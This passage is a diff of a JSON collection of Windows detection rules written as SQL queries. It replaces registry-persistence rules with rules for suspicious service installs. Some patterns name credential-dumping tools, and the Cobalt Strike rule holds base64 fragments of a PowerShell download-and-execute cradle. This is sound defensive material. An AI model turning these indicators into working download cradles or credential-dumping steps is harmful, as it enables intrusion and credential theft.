'%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "New DLL Added to AppInit_DLLs Registry Key", - "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", - "status": "test", - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.010" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + ], + "filename": "win_system_service_install_susp_double_ampersand.yml" + }, + { + "title": "New PDQDeploy Service - Server Side", + "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "status": "experimental", + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "falsepositives": [ + "Legitimate use of the tool" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + "filename": "win_system_service_install_pdqdeploy.yml" }, { - "title": "Atbroker Registry Change", - "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "id": "175997c5-803c-4b08-8bb0-70b099f47595", "status": "experimental", - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Creation of non-default, legitimate at usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_atbroker_change.yml" + "filename": "win_system_invoke_obfuscation_via_compress_services.yml" }, { - "title": "PortProxy Registry Key", - "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", - "status": "test", - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_portproxy_registry_key.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Windows Defender Threat Detection Disabled - Service", + "id": "6c0a7755-6d31-44fa-80e1-133e57752680", + "status": "stable", + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator actions", + "Auto updates of Windows Defender causes restarts" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7036' AND Provider_Name = 'Service Control Manager' AND param1 IN ('Windows Defender Antivirus Service', 'Service antivirus Microsoft Defender') AND param2 = 'stopped')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_defender_disabled.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Mesh Agent Service Installation", + "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "status": "experimental", + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_service_install_mesh_agent.yml" }, { - "title": "New DLL Added to AppCertDlls Registry Key", - "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "author": "Ilyas Ochkov, oscd.community", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1546.009" + "attack.execution", + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "TacticalRMM Service Installation", + "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "status": "experimental", + "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_service_install_tacticalrmm.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "PsExec Service Installation", + "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "status": "experimental", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'PSEXESVC' AND ImagePath LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\') OR (EventID = '7036' AND ServiceName = 'PSEXESVC')))" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_service_install_psexec.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", - "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "status": "test", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value 